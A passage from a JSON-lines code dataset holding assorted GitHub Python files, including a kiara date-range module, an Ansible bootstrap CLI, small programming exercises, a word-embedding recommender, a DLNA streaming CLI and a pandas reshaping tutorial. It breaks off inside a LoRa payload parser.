True,\n },\n }\n\n return inputs\n\n def create_output_schema(\n self,\n ) -> typing.Mapping[\n str, typing.Union[ValueSchema, typing.Mapping[str, typing.Any]]\n ]:\n outputs = {\n \"within_range\": {\n \"type\": \"boolean\",\n \"doc\": \"A boolean indicating whether the provided date was within the allowed range ('true'), or not ('false')\",\n }\n }\n return outputs\n\n def process(self, inputs: ValueSet, outputs: ValueSet) -> None:\n\n from dateutil import parser\n\n d = inputs.get_value_data(\"date\")\n earliest: typing.Optional[datetime.datetime] = inputs.get_value_data(\"earliest\")\n latest: typing.Optional[datetime.datetime] = inputs.get_value_data(\"latest\")\n\n if not earliest and not latest:\n outputs.set_value(\"within_range\", True)\n return\n\n if hasattr(d, \"as_py\"):\n d = d.as_py()\n\n if isinstance(d, str):\n d = parser.parse(d)\n\n if earliest and latest:\n matches = earliest <= d <= latest\n elif earliest:\n matches = earliest <= d\n else:\n matches = d <= latest\n\n outputs.set_value(\"within_range\", matches)\n","repo_name":"DHARPA-Project/kiara_modules.core","sub_path":"src/kiara_modules/core/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8195656380","text":"from typing import List\n\nfrom click import Context, argument\nfrom jbhannah.infrastructure import logger\nfrom jbhannah.infrastructure.ansible.playbook import run_playbook\nfrom jbhannah.infrastructure.click import proxy_command, verbose_option\n\nBOOTSTRAP_ENV = {\n \"ANSIBLE_HOST_KEY_CHECKING\": \"false\",\n \"ANSIBLE_TRANSPORT\": \"paramiko\"\n}\n\n\n@proxy_command()\n@argument(\"selectors\", nargs=-1, required=True)\n@verbose_option(logger)\nasync def bootstrap(ctx: Context, selector_list: List[str]):\n \"\"\"Bootstrap one or more remote hosts.\"\"\"\n logger.debug(\"Bootstrapping host selectors {selectors}\".format(\n selectors=\", \".join(selector_list)))\n await run_playbook(\"bootstrap\",\n selector_list,\n *ctx.args,\n env=BOOTSTRAP_ENV)\n","repo_name":"jbhannah/infrastructure","sub_path":"src/jbhannah/infrastructure/cli/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43568890214","text":"s = input(\"stringa: \")\n\nm = 0, 0 # indice e numero\nfor i, c in enumerate(s):\n count = 0\n while i + count < len(s) and c == s[i + count]:\n count += 1\n if count >= m[1]:\n m = (c, count)\n\nprint(m[0], m[1])\n\n\n ","repo_name":"Nikappa57/my-sapienza-experience","sub_path":"Introduzione alla programmazione/LabPython06/A_Ex5.py","file_name":"A_Ex5.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3693788192","text":"from gensim.models import Word2Vec, KeyedVectors\nfrom gensim.parsing.preprocessing import strip_multiple_whitespaces, strip_punctuation, strip_tags\nimport pandas as pd\nfrom sklearn.preprocessing import normalize\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport networkx as nx\nimport numpy as np\nimport scipy\n\nclass EmbeddingVectorSpace:\n\n def __init__(self, df_item_origin=None, df_ratings = None):\n '''\n self._word2vect_model = KeyedVectors.load_word2vec_format(\n '/home/ignacio/Datasets/Word Embeddings Pretrained Vectors/Word2Vec/GoogleNews-vectors-negative300.bin',\n binary=True)\n '''\n self._word2vect_model = KeyedVectors.load_word2vec_format(\n '/home/ignacio/Datasets/Word Embeddings Pretrained Vectors/GLoVe/glove-w2v.840B.300d.txt', binary=False)\n self._word2vect_model.init_sims(replace=True)\n self._df_item_origin = df_item_origin.copy()\n self._users_profile = {}\n self._origin_embeddings = None\n self._df_ratings = df_ratings\n\n #Methods to get embeddings\n def process_description(self, description):\n description = description.lower()\n description = strip_punctuation(description)\n description = strip_tags(description)\n description = strip_multiple_whitespaces(description)\n description = description.split(' ')\n description_clean = list(filter(lambda x: x in self._word2vect_model.vocab, description))\n return description_clean\n\n def process_authors(self, authors):\n authors = authors.split(' ')\n author_clean = list(filter(lambda x: x in self._word2vect_model.vocab, authors))\n return author_clean\n\n def get_w2vec(self, soap):\n # vector space of embeddings\n w2v = np.zeros((300,))\n for s in soap:\n w2v += self._word2vect_model.wv[s]\n return w2v / len(soap)\n\n def origin_embedding_space(self):\n self._df_item_origin['description'] = self._df_item_origin['description'].apply(self.process_description)\n self._df_item_origin['genres'] = self._df_item_origin['genres'].str.replace('|', ' ')\n self._df_item_origin['genres'] = self._df_item_origin['genres'].apply(self.process_description)\n self._df_item_origin['director emb'] = self._df_item_origin['director'].str.replace(',', '')\n self._df_item_origin['director emb'] = self._df_item_origin['director emb'].apply(self.process_authors)\n self._df_item_origin['soap'] = self._df_item_origin['description'] + self._df_item_origin['genres'] + self._df_item_origin['director emb']\n origin_embeddings = self._df_item_origin['soap'].apply(self.get_w2vec)\n self._origin_embeddings = np.stack(origin_embeddings)\n return self._origin_embeddings\n\n\n # Methods to get user vector space\n def get_item_profile(self, item_id, matrix):\n idx = self._df_item_origin.index[self._df_item_origin['movieId'] == item_id].tolist()[0]\n item_profile = matrix[idx:idx + 1]\n return item_profile.reshape((-1,))\n\n def get_item_profiles(self, ids, matrix):\n item_profiles_list = [self.get_item_profile(x, matrix) for x in ids]\n item_profiles = np.stack(item_profiles_list)\n return item_profiles\n\n def build_user_profile(self, items_id, user_rating_weigth, matrix):\n user_item_profiles = self.get_item_profiles(items_id, matrix)\n user_item_strengths_weighted_avg = np.sum(np.multiply(user_item_profiles, user_rating_weigth), axis=0) / np.sum(\n user_rating_weigth)\n user_profile_norm = normalize(user_item_strengths_weighted_avg.reshape((1,-1)))\n return user_profile_norm\n\n def build_users_profiles(self):\n users_id = self._df_ratings['userId'].unique()\n for user_id in users_id:\n items_id = (self._df_ratings[self._df_ratings['userId'] == user_id]['movieId']).values\n user_rating_weigth = (self._df_ratings[self._df_ratings['userId'] == user_id]['rating']).values.reshape(-1,1)\n self._users_profile[user_id] = self.build_user_profile( items_id, user_rating_weigth, self._origin_embeddings)\n return self._users_profile\n\n\nclass EmbeddingVectorTargetSpace(EmbeddingVectorSpace):\n\n def __init__(self, df_item_origin=None, df_item_target=None, df_ratings = None):\n super().__init__(df_item_origin=df_item_origin, df_ratings=df_ratings)\n self._df_item_target = df_item_target.copy()\n self._target_embeddings = None\n\n\n def target_embedding_space(self):\n self._df_item_target['description'] = self._df_item_target['description'].fillna('no description')\n self._df_item_target['description'] = self._df_item_target['description'].apply(self.process_description)\n self._df_item_target['common-shelves'] = self._df_item_target['common-shelves'].str.replace('|', ' ')\n self._df_item_target['common-shelves'] = self._df_item_target['common-shelves'].apply(self.process_description)\n self._df_item_target['Book-Author emb'] = self._df_item_target['Book-Author'].apply(self.process_authors)\n self._df_item_target['soap'] = self._df_item_target['description'] + self._df_item_target['common-shelves'] + self._df_item_target['Book-Author emb']\n target_embeddings = self._df_item_target['soap'].apply(super().get_w2vec)\n self._target_embeddings = np.stack(target_embeddings)\n return self._target_embeddings\n","repo_name":"ignaciogatti/CrossDomRecSys","sub_path":"space_model/EmbeddingVectorSpace.py","file_name":"EmbeddingVectorSpace.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"40195358525","text":"# List vs Tuple\n\n# Some functions used in Tuple\n'''\n\n1. len()\n2. min()\n3. max()\n4. sum()\n5. any()\n6. all()\n7. sorted()\n\n\n\n# Methods not use in Tuple\n\n1. append()\n2. insert()\n3. remove()\n4. pop()\n5. clear()\n6. sort()\n7. reverse()\n\n'''\n\n# You can create list inside tuple and vice-versa\n\nlst = [1,(2,3),4,5]\ntpl = ([1,2],3,4,5)\nprint(lst,tpl)","repo_name":"devankit01/Python-DSA","sub_path":"Tuple/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33437769031","text":"#User function Template for python3\n\nclass Solution:\n def isDigitSumPalindrome(self,N):\n N = str(N)\n sum = 0\n for i in (N):\n sum += int(i) \n sum = str(sum)\n \n return 1 if sum[::-1] == sum else 0 \n \n #code here\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__=='__main__':\n t=int(input())\n for _ in range(t):\n N=int(input())\n ob=Solution()\n print(ob.isDigitSumPalindrome(N))\n# } Driver Code Ends","repo_name":"AbdulMo007/Leetcode-Submissions","sub_path":"Sum of Digit is Pallindrome or not - GFG/sum-of-digit-is-pallindrome-or-not.py","file_name":"sum-of-digit-is-pallindrome-or-not.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24503079289","text":"def getImageFromElementCSS(element):\n styles = str(element).split(';')\n if styles:\n matches = []\n for style in styles:\n if style.startswith('background-image'):\n matches.append(style)\n return matches[0].split('(')[1].split(\")\")[0]\n else:\n return ''","repo_name":"codekeyz/joynews-web-scraper","sub_path":"joyscraper/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11406295267","text":"# -*- coding: utf-8 -*-\nimport allure\n\nfrom model.group import Group\n\n\ndef test_add_group(app, db, json_groups, check_ui):\n group = json_groups\n with allure.step('Given a group list'):\n list_before = db.get_group_list()\n with allure.step('When i add a group %s to the list' % group):\n app.group.create(group)\n with allure.step('Then a new group list is equal the old list with added group'):\n list_after = db.get_group_list()\n list_before.append(group)\n assert sorted(list_before, key=Group.id_or_max) == sorted(list_after, key=Group.id_or_max)\n if check_ui:\n assert sorted(list_after, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)\n","repo_name":"SergeyDorokhov/python_training","sub_path":"tests/test_add_group.py","file_name":"test_add_group.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9026476471","text":"import asyncio\nfrom cmd.config import set_env\nfrom cmd.di import Container\n\nfrom dependency_injector.wiring import Provide, inject\nfrom domain.helpers.constants import (QUEUE_MANAGE_MODELS, QUEUE_TRAINING_NLP, SUBSCRIPTION_REMOVE_MODELS, SUBSCRIPTION_REMOVE_MODELS_BY_USER,\n SUBSCRIPTION_TRAINING_MODEL_COMMAND)\nfrom domain.usecases.notifications_usecase import EventNotificationUsecase\nfrom domain.usecases.storage_models_usecase import StorageModelsUsecase\nfrom domain.usecases.training_usecase import TrainingUsecase\nfrom infraestructure.messaging.controller.handlers import \\\n ControllerSubscriptions\nfrom infraestructure.messaging.natsImp import NatsImp\nfrom domain.helpers.loggers import logger\nset_env()\n\n@inject\nasync def main(training_usecase: TrainingUsecase = Provide[Container.training_usecase],\n storage_usecase: StorageModelsUsecase = Provide[Container.storage_usecase],\n notification_usecase: EventNotificationUsecase = Provide[Container.notification_usecase]):\n\n controllers_instance = ControllerSubscriptions(\n training_usecase, storage_usecase, notification_usecase)\n\n # NATS client listen connections\n nats_instance = NatsImp()\n await nats_instance.set_up()\n client = nats_instance.client\n logger.info(\"training nlp start!!\")\n # subscriptors\n await client.subscribe(SUBSCRIPTION_TRAINING_MODEL_COMMAND, queue=QUEUE_TRAINING_NLP, cb=controllers_instance.training_model_handler)\n await client.subscribe(SUBSCRIPTION_REMOVE_MODELS, queue=QUEUE_MANAGE_MODELS, cb=controllers_instance.delete_models_by_trainig_id)\n await client.subscribe(SUBSCRIPTION_REMOVE_MODELS_BY_USER, queue=QUEUE_MANAGE_MODELS, cb=controllers_instance.delete_models_by_user_id)\n\n\nif __name__ == '__main__':\n container = Container()\n container.init_resources()\n container.wire(modules=[__name__])\n\n loop = asyncio.get_event_loop()\n try:\n asyncio.ensure_future(main())\n loop.run_forever()\n finally:\n loop.close()\n","repo_name":"LuisDiazM/nlp-chatbots","sub_path":"backend/training-nlp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23446646346","text":"# 연속 부분 수열 합의 개수\n# \"원형 수열의 연속하는 부분 수열의 합\"으로 만들 수 있는 수가 \"모두 몇 개\"\ntmp_answer = set()\n\ndef solution(elements):\n size = len(elements)\n for start_idx in range(len(elements)) :\n sum_num = 0\n for length in range(size) :\n sum_num += elements[(start_idx+length) % size]\n tmp_answer.add(sum_num)\n return len(tmp_answer)\n\nprint(solution([7, 9, 1, 1,4]))","repo_name":"JoungMinJu/PyCodingTest","sub_path":"Programmers/continuous.py","file_name":"continuous.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8920869680","text":"def permutaciones(cadena):\r\n p = factorial(len(cadena)) # Numero de permutaciones\r\n # print(p)\r\n n = len(cadena) # longitud de la cadena\r\n # print(n)\r\n # print(factorial(len(cadena)-1))\r\n i = 0 # contador de indices, llegara hasta p (de 0 a p-1)\r\n # se crea la lista con el numero de espacios a llenar por las p permutaciones\r\n char_list = [\" \"]*p\r\n #print(char_list)\r\n\r\n \"\"\"for j in range (1,n+1):\r\n for x in range(n):\r\n for i in range(x*factorial(n-j), (x+1)*factorial(n-j)):\r\n if cadena[x] not in char_list[i]:\r\n char_list[i] = char_list[i]+cadena[x]\"\"\"\r\n new_char_list = arreglos(cadena, n, char_list)\r\n\r\n # x=0\r\n #char_list[i] = cadena[x] + cadena[x]\r\n\r\n return new_char_list\r\n\r\n\r\ndef arreglos(cadena, n, char_list):\r\n for j in range(1, n+1):\r\n for x in range(n):\r\n for i in range(x*factorial(n-j), (x+1)*factorial(n-j)):\r\n if cadena[x] not in char_list[i]:\r\n char_list[i] = char_list[i]+cadena[x]\r\n if n == 0:\r\n return char_list\r\n arreglos(cadena, n-1, char_list)\r\n return char_list\r\n\r\n\r\ndef factorial(n):\r\n f = 1\r\n for i in range(1, n+1):\r\n f = f*i\r\n return f\r\n\r\n\r\ncadena = (\"abcd\")\r\n\r\nresultado = permutaciones(cadena)\r\n\r\nprint(resultado)\r\n","repo_name":"Chuchinbad/VS-code","sub_path":"permitaciones.py","file_name":"permitaciones.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21830351839","text":"import csv\n\nimport matplotlib.pyplot as plt\n\"\"\"Visual data analysis - Comparing the highest and lowest daily temperatures in Sitka and Death Valley\"\"\"\n\n\n\"\"\"Import of modules: csv, matplotlib and datetime\"\"\"\n\nfrom datetime import datetime\n\n\"\"\"Assignment a csv file name to a variable\"\"\"\nfilename = 'sitka_weather_2014.csv' \n\n\"\"\"Opening a file as an alias\"\"\"\nwith open(filename) as f_obj:\n \"\"\"Assignment a method csv_reader to variable and passed f_obj\"\"\"\n reader = csv.reader(f_obj)\n\n \"\"\"Reading headers using the next method\"\"\"\n header_row = next(reader)\n \"\"\"Create empty lists\"\"\"\n highs = []\n lows = []\n dates = []\n\n \"\"\"Iteration in reader for date, high and low data\"\"\"\n for row in reader:\n try:\n date = datetime.strptime(row[0], \"%Y-%m-%d\") #using datetime and strptime method to formatted date\n high = (int(row[1]))\n low = (int(row[3]))\n except ValueError: #In case there is no data, we return an error\n print(date, 'Brak danych.')\n else:\n dates.append(date)\n highs.append(high) \n lows.append(low)\n\nfilename_2 = 'death_valley_2014.csv'\nwith open(filename_2) as f_obj_2:\n reader_2 = csv.reader(f_obj_2)\n header_row_2 = next(reader_2)\n\n highs_2 = []\n lows_2 = []\n dates_2 = []\n\n for row in reader_2:\n try:\n date_2 = datetime.strptime(row[0], \"%Y-%m-%d\")\n high_2 = (int(row[1]))\n low_2 = (int(row[3]))\n except ValueError:\n print(date, 'Brak danych.')\n else:\n dates_2.append(date_2)\n highs_2.append(high_2) \n lows_2.append(low_2)\n\n\n\n fig = plt.figure(dpi=128, figsize=(10,6))\n plt.plot(dates, highs, c='red', alpha=0.6)\n plt.plot(dates, lows, c='blue', alpha=0.6)\n plt.fill_between(dates, highs, lows, facecolor='blue', alpha=0.1)\n plt.plot(dates_2, highs_2, c='green')\n plt.plot(dates_2, lows_2, c='yellow')\n plt.fill_between(dates_2, highs_2, lows_2, facecolor='green', alpha=0.1)\n plt.title(\"Najwyższa i najniższa temperatura dnia - 2014\", fontsize=20)\n fig.autofmt_xdate()\n plt.ylabel('Temperatura (F)', fontsize=16)\n plt.tick_params(axis='both', which='major', labelsize=12)\n\n plt.show()","repo_name":"TKdev96/Visual-data-analysis-in-python","sub_path":"comparison_temp_sitka_vs_death_valley.py","file_name":"comparison_temp_sitka_vs_death_valley.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31722738010","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\n\nimport argparse\nimport json\nimport os\nimport sys\n\nfrom . import devices, dlna, streaming\n\n\ndef get_subtitle(file_video):\n\n video, extension = os.path.splitext(file_video)\n\n file_subtitle = \"{0}.srt\".format(video)\n\n if not os.path.exists(file_subtitle):\n return None\n return file_subtitle\n\n\ndef list_devices(args):\n\n my_devices = devices.get_devices(args.timeout)\n\n for i, device in enumerate(my_devices, 1):\n print(\"Device {0}:\\n{1}\\n\\n\".format(i, json.dumps(device, indent=4)))\n\n\ndef play(args):\n\n # Get video and subtitle file names\n\n files = {\"file_video\": args.file_video}\n\n if args.use_subtitle:\n\n if not args.file_subtitle:\n args.file_subtitle = get_subtitle(args.file_video)\n\n if args.file_subtitle:\n files[\"file_subtitle\"] = args.file_subtitle\n\n # Select device to play\n device = None\n\n if args.device_url:\n device = devices.register_device(args.device_url)\n else:\n my_devices = devices.get_devices(args.timeout)\n\n if len(my_devices) > 0:\n if args.device_query:\n device = [\n device for device in my_devices\n if args.device_query.lower() in str(device).lower()][0]\n else:\n device = my_devices[0]\n\n if device:\n print('Start streaming on device: ' + device['location'])\n else:\n sys.exit(\"No devices found.\")\n\n # Configure streaming server\n\n target_ip = device[\"hostname\"]\n serve_ip = streaming.get_serve_ip(target_ip)\n\n if args.file_video.startswith('http://') or args.file_video.startswith('https://'):\n files_urls = files\n else:\n files_urls = streaming.start_server(files, serve_ip)\n \n print(files_urls)\n\n # Play the video through DLNA protocol\n\n dlna.play(files_urls, device)\n\n\ndef run():\n\n parser = argparse.ArgumentParser(\n description=\"A minimal UPnP/DLNA media streamer.\")\n parser.add_argument(\"-t\", \"--timeout\", type=float, default=5)\n subparsers = parser.add_subparsers(dest=\"subparser_name\")\n\n p_list = subparsers.add_parser('list')\n p_list.set_defaults(func=list_devices)\n\n p_play = subparsers.add_parser('play')\n p_play.add_argument(\"-d\", \"--device\", dest=\"device_url\")\n p_play.add_argument(\"-q\", \"--query-device\", dest=\"device_query\")\n p_play.add_argument(\"-s\", \"--subtitle\", dest=\"file_subtitle\")\n p_play.add_argument(\"-n\", \"--no-subtitle\",\n dest=\"use_subtitle\", action=\"store_false\")\n p_play.add_argument(\"file_video\")\n p_play.set_defaults(func=play)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n\n run()\n","repo_name":"pimpreneil/nano-dlna","sub_path":"nanodlna/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"37054627500","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.7.1\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# ### Prepared by Abhishek Kumar\n# ### https://www.linkedin.com/in/abhishekkumar-0311/\n#\n\n# +\n# To get multiple outputs in the same cell\n\nfrom IPython.core.interactiveshell import InteractiveShell\nInteractiveShell.ast_node_interactivity = \"all\"\n\n# +\n# Import the required libraries\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# %matplotlib inline\n# -\n\n# # Wide to Long DataFrame\n# One record to many records based on a ID column\n#\n# ```py\n# 1. df.melt(id_vars=[ ], value_vars=[ ], var_name=[ ], value_name=[ ])\n# 2. pd.wide_to_long(df, i=[ ], j=[ ], stubnames=[ ], sep=\"_\") \n# # stubnames provides the flexibility to add the multiple sets of series of variables```\n# apply reset_index() to flatten out the indices and make the it more usable.\n#\n\n# ## df.melt()\n\ndf = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [200,180],\n 'prem3' : [300,80],})\ndf\n\ndf_melted = df.melt(id_vars=['id','name']).sort_values('id')\ndf_melted\n\ndf2 = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [np.NaN,180],\n 'prem3' : [300,np.NaN],})\ndf2\n\ndf2_melted = df2.melt(id_vars=['id','name'], var_name = 'month', value_name = 'premiums').sort_values('id')\ndf2_melted\n\n# +\n# df2_melted = df2_melted.loc[]\n\n# +\ndf3 = df2.copy()\n\ndf3_melted = df3.melt(id_vars=['id'], value_vars=['prem1','prem2','prem3'], var_name = 'month', value_name = 'premiums').sort_values('id')\ndf3_melted\n# -\n\n# ### Example 2\n\n# +\n# Setup : DataFrame creation\n\nsalary = [['1','Abhishek Kumar','AIML', 'Machine Learning Engineer','M', 'Y', '04051990', 1121000],\n ['2','Arjun Kumar','DM', 'Tech Lead','M', 'Y', '09031992', 109000],\n ['3','Vivek Raj','DM', 'Devops Engineer','M', 'N', np.NaN , 827000],\n ['4','Mika Singh','DM', 'Data Analyst','F', 'Y', '15101991', np.NaN],\n ['5','Anusha Yenduri','AIML', 'Data Scientist','F', 'Y', '01011989', 921000],\n ['6','Ritesh Srivastava','AIML', 'Data Engineer','M', 'Y', np.NaN, 785000]]\n\ncolumns_name=['Emp_Id','Emp_Name','Department','Role','Gender', 'WFH Status', 'DOB', 'Salary']\n\nemp_df = pd.DataFrame(salary,columns=columns_name)\nemp_df\n\n# +\n# Sample data set-up\n\nemp_df_1 = emp_df.copy()\n\nemp_df_1['Holi_Bonus'] = emp_df_1['Salary']*0.05\nemp_df_1['Diwali_Bonus'] = emp_df_1['Salary']*0.075\nemp_df_1['Yearly_Bonus'] = emp_df_1['Salary']*0.10\nemp_df_1\n# -\n\nemp_df_1_long = emp_df_1.melt(id_vars = ['Emp_Id','Emp_Name'] , \n value_vars = [ 'Holi_Bonus','Diwali_Bonus','Yearly_Bonus' ],\n var_name = 'Event',\n value_name = 'Bonus' )\nemp_df_1_long\n\n# ## pd.wide_to_long()\n\ndf4 = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [np.NaN,180],\n 'prem3' : [300,np.NaN],\n 'disc1' : [20,40],\n 'disc2' : [np.NaN,30],\n 'disc3' : [50,np.NaN],})\ndf4\n\n# +\n# melt is not working as expected.\n# There are 2 sets of sequential columns and both the sets are transposed to the same column\n# NOT Working as EXPECTED\n\n# df4_melted = df4.melt(id_vars=['id','name'], value_vars=['prem1','prem2','prem3','disc1','disc2','disc3'], var_name = 'month', value_name = 'values').sort_values('id').reset_index(drop='index')\n# df4_melted\n# -\n\n# #### Another way to transform is to use the wide_to_long() panel data convenience function. It is less flexible than melt(), but more user-friendly.\n\ndf4_melted1 = pd.wide_to_long(df4, i=['id','name'], j='month', stubnames=['prem','disc'])\ndf4_melted1\n\ndf4_melted1.reset_index(inplace=True)\ndf4_melted1\n\n# +\n# Trying to see the usage of suffix= parameter. Not completed yet.\n# df4_melted2 = pd.wide_to_long(df4, i=['id','name'], j='month', stubnames=['prem','disc'])#, suffix='1')\n# df4_melted2\n# -\n\n# ## df.stack()\n\ndf5 = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [np.NaN,180],\n 'prem3' : [300,np.NaN]})\ndf5\n\ndf5.set_index(['id','name']).stack().reset_index()\n\n# > 1. Important thing to note - there is single series of variable (perm1 - perm3), which is transposed here.\n# > 2. The index is set before the process of stacking.\n# > 3. If there is multile sets of series of variables, then this would not work as expected.\n# > 4. By default, dropna = True, and hence it drops the NaN values\n\ndf5.set_index(['id','name']).stack(dropna=False).reset_index()\n\ndf6 = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [np.NaN,180],\n 'prem3' : [300,np.NaN],\n 'disc1' : [20,40],\n 'disc2' : [np.NaN,30],\n 'disc3' : [50,np.NaN]})\ndf6\n\ndf6_stacked = df6.set_index(['id','name']).stack().reset_index()\ndf6_stacked\n\n# +\n# stack is not working as expected.\n# There are 2 sets of sequential columns and both the sets are transposed to the same column\n# NOT Working as EXPECTED\n# -\n\n\n\n# # Long to Wide DataFrame\n# Multiple records per ID to a single(one) record of each ID.\n#\n# ```python\n# 1. pd.pivot()\n# 2. pd.pivot_table()\n# 3. Use df.set_index([id_vars columns and var_name columns]) and chain it with .unstack(level=2 (here))```\n\n# ### pd.pivot() - Does not work for multiple indexes, So in this case, does not work\n\n# ### pd.pivot_table() - Although it is for aggregation, it worked to change LONG to WIDE Data\n\ndf4_melted1\n\ndf_wide = pd.pivot_table(df4_melted1, index=['id','name'], columns='month', values=['prem','disc'])\ndf_wide\n\ndf_wide.columns\n\n# +\n# df_wide = df4_melted1.pivot(index=['id','name'], columns='month', values=['prem'])\n# df_wide\n# -\n\ndf_wide.columns = ['_'.join(map(str, tup)) for tup in df_wide.columns]\ndf_wide.reset_index()\n\n# ### df.unstack() - \n# #### Use df.set_index([id_vars columns and var_name columns]) and chain it with .unstack(level=2 (here))\n\nwide_df = df4_melted1.set_index(['id','name','month']).unstack(level=2)\nwide_df\n\n# ID: level = 0; RegionVariable: level = 1; 'EXP': level = 2; 'ModelID': level = 3;\n\nwide_df.columns\n\n# +\n# Code to flatten the list and at the same time concatenating it.\n\nwide_df.columns = ['_'.join(map(str, tup)) for tup in wide_df.columns] # Everything is back to the first dataframe\n# -\n\nwide_df.columns\n\nwide_df\n\nwide_df.reset_index()\n\n\n\n# ### Example 2\n\nemp_df_1_long\n\nemp_df_1_wide_1 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name'] ,\n columns = 'Event',\n values = 'Bonus' ).reset_index()\nemp_df_1_wide_1\n\nemp_df_1_wide_2 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name'] ,\n columns = 'Event',\n values = 'Bonus',\n margins = True ).reset_index() # default aggfunc = 'mean'\nemp_df_1_wide_2\n\nemp_df_1_wide_3 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name'] ,\n columns = 'Event',\n values = 'Bonus',\n margins = True,\n aggfunc = 'sum').reset_index()\nemp_df_1_wide_3\n\n# +\n# Only row-wise aggregation\n\nemp_df_1_wide_4 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name']) # default aggfunc = 'mean'\nemp_df_1_wide_4\n# -\n\nemp_df_1_wide_4 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name'] ,\n columns = 'Event',\n values = 'Bonus',\n fill_value = 1000)\nemp_df_1_wide_4\n\n# ### There are other techniques that enables Re-Shaping of dataframes.\n#\n# i. pivot()\n# ii. stack() & unstack()\n# iii. wide_to_long()\n# iv. crosstab()\n# v. cut()\n\n\n","repo_name":"AbhishekKumar-0311/Machine-Learning-with-Python","sub_path":"Pandas/Learning_Pandas_Part_5_Reshaping.py","file_name":"Learning_Pandas_Part_5_Reshaping.py","file_ext":"py","file_size_in_byte":8475,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42568562604","text":"# Create a method that decrypts reversed-lines.txt\n\ndef decrypt(file_rev):\n try:\n with open(file_rev, \"r\") as f:\n with open(file_reversed, \"w\") as rev:\n text = f.readlines()\n for i in text:\n rev.write(i[0:-1][::-1] + \"\\n\")\n return \"Reversing done!\"\n except IOError:\n return \"Unable to open file!\"\n\nfile_rev = \"reversed-lines.txt\"\nfile_reversed = \"reverse-done.txt\"\nprint(decrypt(file_rev))","repo_name":"green-fox-academy/Bpatrik83","sub_path":"week-03/day-02/08_reversed_lines.py","file_name":"08_reversed_lines.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21776694493","text":"import os\nfrom json import dumps\nfrom datetime import datetime, timedelta\nimport csv\nimport dateutil.parser as dp\n\n\nDatarates = [\"SF12BW125\", \"SF11BW125\", \"SF10BW125\",\"SF9BW125\", \"SF8BW125\", \"SF7BW125\"]\ncurrent_directory = os.getcwd()\ntestpayload = bytearray( b'\\x02\\x01\"\\x04\\x8d\\xfcn\\x00 \\x03\\x90\\xfco\\x00\\x1e\\x03\\x8d\\xfcp\\x00\"\\x03\\x90\\xfcn\\x00\"\\x03\\x8e\\xfcq\\x00!\\x03\\x8e\\xfcl\\x00!\\x03\\x8d\\xfcn\\x00 \\x03\\x8e\\xfcq')\n\ndef WritePayloadDataToFile(dev_id, port, payload, Metadata, date):\n payload_data = bytearray()\n battery_lvl = 0\n light_lvl = 0\n dev_timestamp = 0\n if port == 4:\n payload_data = payload\n elif port == 2 or port == 8:\n dev_timestamp = int.from_bytes(payload[0:4], byteorder='big')\n battery_lvl = int.from_bytes(payload[4:5], byteorder='big')\n light_lvl = int.from_bytes(payload[5:6], byteorder='big')\n temperature = 